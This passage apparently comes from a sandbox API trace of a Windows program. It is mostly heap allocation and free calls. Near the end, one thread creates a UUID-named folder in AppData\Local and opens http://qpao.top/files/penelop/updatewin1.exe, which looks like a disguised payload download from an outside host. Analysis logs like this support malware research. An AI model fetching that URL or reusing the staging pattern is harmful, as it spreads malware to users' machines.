returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e82e8 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e9358 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e7ab8 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df51e8 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62eac38 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62eb8b8 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df5a70 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df62f8 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e9b90 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62ec538 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62ecd80 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62e8b20 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62ea3c8 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62ed5c8 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df6b80 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df7408 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df7c90 | out: hHeap=0x31d0000) returned 1 [0133.762] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62ee630 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62ef6a0 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df8518 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f0f80 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f1c00 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df8da0 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df9628 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62efed8 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f2880 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f30c8 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62eee68 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f0710 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f3910 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df9eb0 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dfa738 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dfafc0 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dfb848 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f4a38 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dfc0d0 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6305ac8 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6306748 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f52c0 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f5b48 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f6c58 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6305260 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f74e0 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f7d68 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f85f0 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f63d0 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f8e78 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62f4148 | out: hHeap=0x31d0000) returned 1 [0133.763] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c6378 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32bfec8 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c6bc8 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c5338 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d1350 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63506e0 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dda6f8 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6322d90 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6323618 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6323ea0 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6324728 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6322508 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x632e070 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea5fe8 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea6800 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea7018 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea7830 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea8048 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea8860 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e1cff8 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62fca30 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62fd2b8 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62fdb40 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62fe3c8 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62fec50 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d6c00 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62ff4d8 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62ffd60 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d7448 | out: hHeap=0x31d0000) returned 1 [0133.764] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63073c8 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6307c30 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63005e8 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6300e70 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6308498 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6308ce0 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63016f8 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6301f80 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6302808 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6303090 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6303918 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6309540 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6309dc8 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630a650 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630aed8 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630b760 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6319528 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6319d90 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630bfe8 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630c870 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630d0f8 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631a5f8 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631ae40 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630d980 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630e208 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630ea90 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630f318 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x630fba0 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6310428 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6310cb0 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6311538 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6311dc0 | out: hHeap=0x31d0000) returned 1 [0133.765] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631b688 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631bef0 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6312648 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6312ed0 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6313758 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631c758 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6313fe0 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6314868 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63150f0 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6315978 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6316200 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6316a88 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6317310 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6317b98 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6318420 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631cfb8 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x632cfa0 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x632d808 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631d840 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631e0c8 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631e950 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631f1d8 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x631fa60 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63202e8 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6320b70 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63213f8 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6321c80 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d4090 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62db5c8 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32c0068 | out: hHeap=0x31d0000) returned 1 [0133.766] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d5b98 | out: hHeap=0x31d0000) returned 1 [0133.767] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62fc1a8 | out: hHeap=0x31d0000) returned 1 [0133.767] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62dadb0 | out: hHeap=0x31d0000) returned 1 [0133.767] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62da4b8 | out: hHeap=0x31d0000) returned 1 [0133.767] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x31f15e8 | out: hHeap=0x31d0000) returned 1 [0133.768] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x31f0700 | out: hHeap=0x31d0000) returned 1 [0133.768] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f2d4 | out: phModule=0x18f2d4) returned 0 [0133.769] ExitProcess (uExitCode=0x0) [0133.770] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62cf268 | out: hHeap=0x31d0000) returned 1 [0133.770] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x31ef2f0 | out: hHeap=0x31d0000) returned 1 [0133.779] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 91 os_tid = 0x344 Thread: id = 92 os_tid = 0xaa8 Thread: id = 93 os_tid = 0xb1c Thread: id = 94 os_tid = 0xaa0 Thread: id = 95 os_tid = 0xb20 Thread: id = 96 os_tid = 0xb34 Thread: id = 97 os_tid = 0xb54 Thread: id = 98 os_tid = 0xb58 Thread: id = 99 os_tid = 0xb5c Thread: id = 109 os_tid = 0xa08 [0124.322] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x110) returned 0x32273f8 [0124.322] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x110) returned 0x5dda6f8 [0124.323] GetLastError () returned 0x54f [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3bc) returned 0x62bf820 [0124.323] GetCurrentThreadId () returned 0xa08 [0124.323] SetLastError (dwErrCode=0x54f) [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x5e15718 [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x18) returned 0x5e07db0 [0124.323] GetLastError () returned 0x54f [0124.323] SetLastError (dwErrCode=0x54f) [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x5e15760 [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f288 [0124.323] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e07db0 | out: hHeap=0x31d0000) returned 1 [0124.323] GetLastError () returned 0x54f [0124.323] SetLastError (dwErrCode=0x54f) [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f138 [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x48) returned 0x5e34060 [0124.323] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f288 | out: hHeap=0x31d0000) returned 1 [0124.323] GetLastError () returned 0x54f [0124.323] SetLastError (dwErrCode=0x54f) [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f288 [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x32bfdf8 [0124.323] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e34060 | out: hHeap=0x31d0000) returned 1 [0124.323] GetLastError () returned 0x54f [0124.323] SetLastError (dwErrCode=0x54f) [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f1a8 [0124.323] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x90) returned 0x31fe100 [0124.323] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32bfdf8 | out: hHeap=0x31d0000) returned 1 [0124.324] GetLastError () returned 0x54f [0124.324] SetLastError (dwErrCode=0x54f) [0124.324] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f2c0 [0124.324] GetLastError () returned 0x54f [0124.324] SetLastError (dwErrCode=0x54f) [0124.324] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5dda6f8 | out: hHeap=0x31d0000) returned 1 [0124.324] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0124.324] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0124.324] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x400) returned 0x62bfbe8 [0124.324] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x62bfbe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0124.325] UuidCreate (in: Uuid=0xc85d768 | out: Uuid=0xc85d768) returned 0x0 [0124.351] UuidToStringA (in: Uuid=0xc85d768, StringUuid=0xc85d6c0 | out: StringUuid=0xc85d6c0) returned 0x0 [0124.351] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f250 [0124.351] RpcStringFreeA (in: String=0xc85d6c0 | out: String=0xc85d6c0) returned 0x0 [0124.351] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="68fff198-b032-4cc5-9a68-f439953f0783" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783") returned 1 [0124.352] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783"), lpSecurityAttributes=0x0) returned 1 [0124.352] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x410) returned 0x62bfff0 [0124.352] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x410) returned 0x62c0408 [0124.352] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x1000) returned 0x62c0820 [0124.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x62c0408, cbMultiByte=-1, lpWideCharStr=0x62c0820, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783") returned 81 [0124.353] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x1010) returned 0x62c1828 [0124.353] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0820 | out: hHeap=0x31d0000) returned 1 [0124.353] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0408 | out: hHeap=0x31d0000) returned 1 [0124.353] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x18) returned 0x5e07d50 [0124.353] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0124.353] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x5e158c8 [0124.353] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x62c0408 [0124.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e158c8, cbMultiByte=-1, lpWideCharStr=0x62c0408, cchWideChar=1072 | out: lpWideCharStr="http://qpao.top/files/penelop/updatewin1.exe") returned 45 [0124.353] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x870) returned 0x62c0c70 [0124.353] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0408 | out: hHeap=0x31d0000) returned 1 [0124.353] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e158c8 | out: hHeap=0x31d0000) returned 1 [0124.353] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x870) returned 0x62c2840 [0124.353] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x62c0408 [0124.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://qpao.top/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x62c0408, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://qpao.top/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0124.353] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x62c30b8 [0124.353] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0408 | out: hHeap=0x31d0000) returned 1 [0124.354] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c2840 | out: hHeap=0x31d0000) returned 1 [0124.354] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://qpao.top/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0125.720] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c30b8 | out: hHeap=0x31d0000) returned 1 [0125.720] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0xc85d6d0, lpdwBufferLength=0xc85d710, lpdwIndex=0x0 | out: lpBuffer=0xc85d6d0*, lpdwBufferLength=0xc85d710*=0x4, lpdwIndex=0x0) returned 1 [0125.720] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x5e159e8 [0125.720] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x20) returned 0x5ea3ed8 [0125.720] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e159e8 | out: hHeap=0x31d0000) returned 1 [0125.720] lstrcpyA (in: lpString1=0x62bfbe8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783" | out: 